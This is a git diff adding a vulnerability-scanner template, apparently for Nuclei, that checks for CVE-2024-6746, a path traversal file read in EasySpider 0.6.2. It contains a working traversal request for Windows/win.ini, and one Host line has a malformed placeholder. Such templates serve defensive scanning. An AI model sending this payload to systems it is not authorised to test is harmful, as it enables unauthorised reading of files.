diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml new file mode 100644 index 0000000000..aa5e7eb642 --- /dev/null +++ b/network/cves/2024/CVE-2024-6746.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-6746 + +info: + name: EasySpider 0.6.2 - Arbitrary File Read + author: securityforeveryone + severity: medium + description: | + A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network. + reference: + - https://github.com/NaiboWang/EasySpider/issues/466 + - https://cvefeed.io/vuln/detail/CVE-2024-6746 + - https://vuldb.com/?id.271477 + - https://vuldb.com/?submit.371998 + - https://vuldb.com/?ctiid.271477 + - https://github.com/NaiboWang/EasySpider + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6746 + cwe-id: CWE-24 + epss-score: 0.00045 + epss-percentile: 0.1594 + metadata: + vendor: NaiboWang + product: EasySpider + tags: cve,cve2024,lfi,network + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /taskGrid/tasklist.html HTTP/1.1 + Host: {{Hostname} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"Task List","Task ID","Task Name","URL","任务列表 | Task List")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /../../../../../../../../../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"bit app support","fonts","extensions")' + - 'status_code == 200' + condition: and